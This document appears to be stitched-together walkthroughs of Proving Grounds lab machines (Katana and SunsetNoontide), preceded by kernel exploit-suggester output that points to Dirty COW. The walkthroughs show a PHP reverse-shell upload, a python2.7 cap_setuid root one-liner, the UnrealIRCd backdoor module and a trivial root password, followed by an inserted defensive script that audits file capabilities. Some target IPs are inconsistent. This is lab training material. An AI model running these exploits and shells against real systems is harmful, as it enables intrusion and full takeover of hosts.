78 kernel space exploits
48 user space exploits

Possible Exploits:

cat: write error: Broken pipe

[+] [CVE-2016-5195] dirtycow

Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2013-2094] perf_swevent

Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
Exposure: highly probable
Tags: RHEL=6,[ ubuntu=12.04{kernel:3.2.0-(23|29)-generic} ],fedora=16{kernel:3.1.0-7.fc16.x86_64},fedora=17{kernel:3.3.4-5.fc17.x86_64},debian=7{kernel:3.2.0-4-amd64}
Download URL: https://www.exploit-db.com/download/26131
Comments: No SMEP/SMAP bypass

[+] [CVE-2013-2094] perf_swevent 2

Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
Exposure: highly probable
Tags: [ ubuntu=12.04{kernel:3.(2|5).0-(23|29)-generic} ]
Download URL: https://cyseclabs.com/exploits/vnik_v1.c
Comments: No SMEP/SMAP bypass

--snip--

[+] [CVE-2012-0809] death_star (sudo)

Details: http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt
Exposure: less probable
Tags: fedora=16
Download URL: https://www.exploit-db.com/download/18436

www-data@ubuntu:/tmp$

And yes, we use Dirty COW:

https://github.com/FireFart/dirtycow/blob/master/dirty.c

pg-katana-play

Exploitation Guide for Katana

Summary

This machine is exploited by a file upload vulnerability in a web application. It is escalated by exploiting a misconfigured Linux file capability in the python2.7 binary.

Enumeration

Nmap

We start off by running an nmap scan:

kali@kali:~$ sudo nmap -p- 192.168.120.154
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 11:33 EDT
Nmap scan report for 192.168.120.154
Host is up (0.030s latency).
Not shown: 65527 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
3389/tcp open  ms-wbt-server
7080/tcp open  empowerid
8088/tcp open  radan-http
8715/tcp open  unknown
9198/tcp open  unknown

Dirb

Using dirb and the default wordlist, we are able to brute-force and discover upload.html on port 8088:

kali@kali:~$ dirb http://192.168.120.155:8088 -X .html -r

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Aug 20 14:05:14 2020
URL_BASE: http://192.168.120.155:8088/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
EXTENSIONS_LIST: (.html) | (.html) [NUM = 1]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.120.155:8088/ ----
+ http://192.168.120.155:8088/error404.html (CODE:200|SIZE:195)                                                
+ http://192.168.120.155:8088/index.html (CODE:200|SIZE:655)                                                   
+ http://192.168.120.155:8088/upload.html (CODE:200|SIZE:6480)                                                 
                                                                                                               
-----------------
END_TIME: Thu Aug 20 14:07:40 2020
DOWNLOADED: 4612 - FOUND: 3

Exploitation

File Upload Vulnerability

Navigating to http://192.168.120.155:8088/upload.html, we see a couple of file upload controls. We are able to upload the PHP reverse shell available at /usr/share/webshells/php/php-reverse-shell.php:

kali@kali:~$ locate php-reverse-shell.php
...
/usr/share/webshells/php/php-reverse-shell.php
...
kali@kali:~$

Set the local port to 4444 in the PHP reverse shell. We can choose either control for our upload. After selecting the prepared PHP reverse shell, click Submit Query. The following message appears:

Please wait for 1 minute!. Please relax!.

File : file1
Name :
Type :
Path :
Size : 0
Please wait for 1 minute!. Please relax!.

file is empty, not stored.

File : file2
Name : php-reverse-shell.php
Type : application/x-php
Path : /tmp/phpFjoLWh
Size : 5495
Please wait for 1 minute!. Please relax!.

Moved to other web server: /tmp/phpFjoLWh ====> /opt/manager/html/katana_php-reverse-shell.php
MD5 : 8783aa0d056e9e74e9d9856605d072a5
Size : 5495 bytes

The important part is this:

Moved to other web server: /tmp/phpFjoLWh ====> /opt/manager/html/katana_php-reverse-shell.php

First, start a netcat listener on port 4444. From the nmap scan, we saw an open port 8715. Using some guesswork and the above message, we can trigger the reverse shell by navigating to http://192.168.120.155:8715/katana_php-reverse-shell.php:

kali@kali:~$ nc -lvp 4444
listening on [any] 4444 ...
192.168.120.155: inverse host lookup failed: Unknown host
connect to [192.168.118.3] from (UNKNOWN) [192.168.120.155] 57806
Linux katana 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
 13:36:02 up 1 min,  0 users,  load average: 0.03, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@katana:/$

Escalation

Checking File Capabilities

Using getcap with the recursive flag from the root directory, we see that a file capability with +ep is set on python2.7:

www-data@katana:~$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep
www-data@katana:~$

Linux file capabilities are maintained by the kernel. The concept is similar to how SUID functions: Linux’s thread privilege checking is based on capabilities, which break the actions normally reserved for root down into smaller portions. The file capability sets are stored in an extended attribute named security.capability; the +ep suffix shown by getcap means the capability is in both the permitted and effective sets, so the binary receives it as soon as it executes.

We are able to abuse the capabilities misconfiguration of python2.7 to drop ourselves into a root shell:

www-data@katana:~$ whoami
whoami
www-data
www-data@katana:~$ /usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'
<c 'import os; os.setuid(0); os.system("/bin/bash")'
root@katana:~# whoami
whoami
root
root@katana:~# 
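To see exactly what getcap is reporting, the security.capability attribute can be read and decoded directly, and auditing it this way lets a defender flag capability sets that are root-equivalent, which is what makes cap_setuid on a general-purpose interpreter fatal. The Python below is an added example, not OffSec's or libcap's code. PYTHON27_XATTR and PING_XATTR are constructed attribute values that match the getcap output above (struct vfs_cap_data, revision 2); scan() reads the real attribute with os.getxattr and therefore only works on Linux.

```python
"""Decode the security.capability xattr that getcap reads and flag file
capabilities that make a binary root-equivalent. Added example for this
write-up, not OffSec's or libcap's code. The two xattr blobs are constructed to
match the getcap output in the guide (cap_setuid+ep on python2.7, cap_net_raw+ep on ping).
"""
import os
import struct

CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_fsetid", "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap",
    "cap_linux_immutable", "cap_net_bind_service", "cap_net_broadcast",
    "cap_net_admin", "cap_net_raw", "cap_ipc_lock", "cap_ipc_owner",
    "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot", "cap_sys_ptrace",
    "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod",
    "cap_lease", "cap_audit_write", "cap_audit_control", "cap_setfcap",
    "cap_mac_override", "cap_mac_admin", "cap_syslog", "cap_wake_alarm",
    "cap_block_suspend", "cap_audit_read",
]

# Capabilities that let a process become root, or read/write anything as root.
ROOT_EQUIVALENT = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
    "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module", "cap_sys_rawio",
    "cap_chown", "cap_fowner", "cap_setfcap",
}

VFS_CAP_FLAGS_EFFECTIVE = 0x000001   # the "e" in "+ep"

# Constructed xattr values: struct vfs_cap_data, little-endian, revision 2.
# magic_etc = 0x02000001 (rev 2 | effective); permitted bit 7 = cap_setuid,
# permitted bit 13 = cap_net_raw; inheritable and the high words are zero.
PYTHON27_XATTR = bytes.fromhex("01000002" "80000000" "00000000" "00000000" "00000000")
PING_XATTR = bytes.fromhex("01000002" "00200000" "00000000" "00000000" "00000000")


def cap_names(mask):
    return [CAP_NAMES[i] if i < len(CAP_NAMES) else f"cap_{i}"
            for i in range(64) if mask >> i & 1]


def decode_security_capability(blob):
    """Parse vfs_cap_data / vfs_ns_cap_data (xattr revisions 1 to 3)."""
    (magic_etc,) = struct.unpack_from("<I", blob, 0)
    revision = magic_etc >> 24
    words = 1 if revision == 1 else 2   # revision 1 holds 32 bits, 2 and 3 hold 64
    permitted = inheritable = 0
    for i in range(words):
        p, inh = struct.unpack_from("<II", blob, 4 + 8 * i)
        permitted |= p << (32 * i)
        inheritable |= inh << (32 * i)
    rootid = None
    if revision == 3:    # namespaced capability: only honoured for this root uid
        (rootid,) = struct.unpack_from("<I", blob, 4 + 8 * words)
    return {
        "revision": revision,
        "effective": bool(magic_etc & VFS_CAP_FLAGS_EFFECTIVE),
        "permitted": cap_names(permitted),
        "inheritable": cap_names(inheritable),
        "rootid": rootid,
    }


def assess(path, caps):
    """Explain why a decoded capability set is dangerous; [] if it is not."""
    risky = sorted(set(caps["permitted"]) & ROOT_EQUIVALENT)
    if not risky:
        return []
    how = "effective on exec" if caps["effective"] else "permitted only; program must raise it"
    return [f"{path}: {','.join(risky)} ({how}) is root-equivalent"]


def scan(root="/"):
    """Walk a tree like `getcap -r` and report dangerous capability sets (Linux only)."""
    report = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                blob = os.getxattr(path, "security.capability", follow_symlinks=False)
            except OSError:        # no xattr, permission denied, or file vanished
                continue
            report.extend(assess(path, decode_security_capability(blob)))
    return report


if __name__ == "__main__":
    for path, blob in (("/usr/bin/python2.7", PYTHON27_XATTR), ("/usr/bin/ping", PING_XATTR)):
        caps = decode_security_capability(blob)
        print(path, caps["permitted"], "+ep" if caps["effective"] else "+p", assess(path, caps))
```

cap_net_raw on ping is the intended, narrow use of file capabilities; cap_setuid on an interpreter that will happily call os.setuid(0) for whoever runs it is not, which is the distinction the assess() step encodes.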

Unintended way: brute-force SSH, and find katana /root.

pg-sunsetnoontide-play

Exploitation Guide for SunsetNoontide
Summary

This machine is exploited via a remote code execution vulnerability in the Unreal IRC server v3.2.8.1. It is then escalated by a very simple password for the root user.
Enumeration
Nmap

We start off by running an nmap scan:

kali@kali:~$ sudo nmap 192.168.187.120 
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-03 11:30 EST
Nmap scan report for 192.168.120.228
Host is up (0.035s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE
6667/tcp open  irc

IRC

This scan shows a potential IRC server running on port 6667.
Let’s connect to this IRC server to see if we can gather more information.
We’ll use irssi here but any other IRC client will do.

kali@kali:~$ irssi

[(status)] /server connect 192.168.187.120

11:11 -!- Irssi: Looking up 192.168.187.120
11:11 -!- Irssi: Connecting to 192.168.187.120 [192.168.120.165] port 6667
11:11 -!- Irssi: Connection to 192.168.187.120 established
11:11 !irc.foonet.com *** Looking up your hostname...
11:11 !irc.foonet.com *** Couldn't resolve your hostname; using your IP address instead
11:11 -!- You have not registered
11:11 -!- Welcome to the ROXnet IRC Network kali!kali@192.168.118.9
11:11 -!- Your host is irc.foonet.com, running version Unreal3.2.8.1
11:11 -!- This server was created Sat 08 Aug EDT at 2020 07:03:52 PM
11:11 -!- irc.foonet.com Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
11:11 -!- UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 are supported by this server
11:11 -!- WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT
STATUSMSG=~&@%+ are supported by this server
11:11 -!- EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server
11:11 -!- There are 1 users and 0 invisible on 1 servers
11:11 -!- I have 1 clients and 0 servers
11:11 -!- Current Local Users: 1 Max: 1
11:11 -!- Current Global Users: 1 Max: 1
11:11 -!- MOTD File is missing
11:11 -!- Mode change [+iwx] for user kali`

We see that the IRC server is Unreal version 3.2.8.1.
Exploitation
Remote Code Execution

Looking up exploits for this version, we find that it is vulnerable to remote code execution:

kali@kali:~$ searchsploit "3.2.8.1"
-------------------------------------------------------------- ----------------------
 Exploit Title                                                |  Path
-------------------------------------------------------------- ----------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)  | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow       | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                | linux/remote/13853.pl
-------------------------------------------------------------- ----------------------

We can use the Metasploit framework module unix/irc/unreal_ircd_3281_backdoor and the payload cmd/unix/reverse_perl to achieve RCE:

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.187.120  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   6667             yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads

Compatible Payloads
===================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
1 cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
2 cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
3 cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
4 cmd/unix/generic normal No Unix Command, Generic Command Execution
5 cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
6 cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
7 cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
8 cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
9 cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
10 cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
11 cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload 0
payload => cmd/unix/bind_perl
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] 192.168.187.120:6667 - Connected to 192.168.187.120:6667...
:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
[*] 192.168.187.120:6667 - Sending backdoor command...
[*] Started bind TCP handler against 192.168.187.120:4444
id
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.187.120:4444) at 2021-09-09 11:23:30 -0400

uid=1000(server) gid=1000(server) groups=1000(server),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
id
uid=1000(server) gid=1000(server) groups=1000(server),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
cd /home
su root
root
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux noontide 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
hostname
noontide
